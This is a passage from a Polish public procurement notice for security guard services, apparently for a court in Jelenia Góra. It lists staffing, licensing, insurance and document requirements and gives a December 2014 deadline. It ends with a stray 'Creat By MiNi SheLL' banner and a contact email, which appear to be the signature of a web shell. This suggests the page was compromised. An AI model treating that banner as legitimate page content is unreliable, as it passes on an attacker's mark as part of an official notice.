-  do pełnienia służby w  poniedziałek w godzinach 18:00- 7:15, w pozostałe dni robocze w godzinach 17:00 - 7:15, w dni wolne od pracy i święta całodobowo  minimum 4 osoby - ochrona osób i mienia może być wykonywana przez  osoby w stosunku, do których nie jest wymagany  wpis, o którym mowa powyższe;
b)     grupą interwencyjną  w liczbie dwóch osób nie karanych, posiadających:
-  zaświadczenie o wpisie na listę kwalifikowanych pracowników ochrony fizycznej  i wykonujących zadania ochrony na rzecz przedsiębiorcy, który uzyskał koncesję  na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia.        
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie :
1. wykazu osób, które będą uczestniczyć w wykonaniu zamówienia. 
2. wykazania, że Wykonawca posiada aktualną decyzję nadającą status SUFO i oświadczenia, że dysponuje grupą interwencyjną wchodzącą w skład SUFO (dysponuje co najmniej jednym  oznakowanym pojazdem zapewniającym przyjazd grupy interwencyjnej do ochranianego obiektu w ciągu 10 minut od momentu wezwania przez pracowników ochrony lub upoważnionych pracowników Zamawiającego). Warunek zostanie uznany za spełniony poprzez złożenie odpowiedniej decyzji i oświadczenia. W wykazie należy zamieścić informacje na temat kwalifikacji zawodowych tych osób, ich  doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do  dysponowania tymi osobami (rodzaj umowy). Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełniony warunek, gdy Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej na kwotę nie mniejszą niż 500 000 zł w zakresie  
prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikat PN EN ISO 9001:2009 z tytułu wdrożenia i stosowania zarządzania jakością  w zakresie usług ochrony osób i mienia.
 Przedmiotowy dokument winien zostać przedstawiony na potwierdzenie, iż oferowane przez wykonawcę usługi  spełniają wymagania zamawiającego. Wobec powyższego, może zostać przedstawiony przez jednego z wykonawców wspólnie ubiegających się o zamówienie (członka konsorcjum) lub łącznie przez kilku wykonawców wspólnie ubiegających się o zamówienie (członków konsorcjum). Uwzględniając powyższe, wystarczającym będzie, jeżeli tylko jeden z uczestników konsorcjum przedstawi certyfikat ISO 9001:2009) w zakresie przedmiotu zamówienia.
Aktualna decyzja nadającą status SUFO,  przyznającą prawo posiadania broni palnej maszynowej  i gazowej w celu ochrony obiektów.
Oświadczenie (na druku ofertowym)  o  dysponowaniu grupą interwencyjną wchodzącą w skład SUFO.  W celu wykazania  braku  podstaw do  wykluczenia  z  postępowania  o   udzielenie zamówienia wykonawcy mają obowiązek także złożyć:Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa  w art. 24    ust. 2 pkt 5 ustawy, albo informacja o tym, że wykonawca nie należy do grupy kapitałowej, według   wzoru stanowiącego załącznik nr 7 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub inny dokument potwierdzający prawo do reprezentowania Wykonawcy.
-Jeżeli podpisujący ofertę nie jest lub nie są właścicielami firmy lub, jeżeli nie są oni wymienieni z imienia i nazwiska w odnośnym dokumencie rejestrowym jako osoby uprawnione do reprezentowania Wykonawcy wymagane jest złożenie Pełnomocnictwa. Pełnomocnictwo składa się w oryginale lub poświadczone notarialnie.
- Wypełniony i podpisany (Formularz oferty) - zgodnie z załącznikiem Nr 1 do SIWZ.
- Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22   ust. 1 ustawy PZP, sporządzone według wzoru przedstawionego w załączniku nr 2 do SIWZ (w przypadku  wspólnego ubiegania się kilku Wykonawców  o udzielenie zamówienia wszyscy ubiegający się Wykonawcy odrębnie lub wspólnie).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - referencje - 25</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.jelenia-gora.so.gov.pl/index.php?id_jednostki=7<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ul. Mickiewicza 21, Jelenia Góra, pok. 63 parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2014 godzina 11:45, miejsce: Ul. Mickiewicza 21, Jelenia Góra, Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com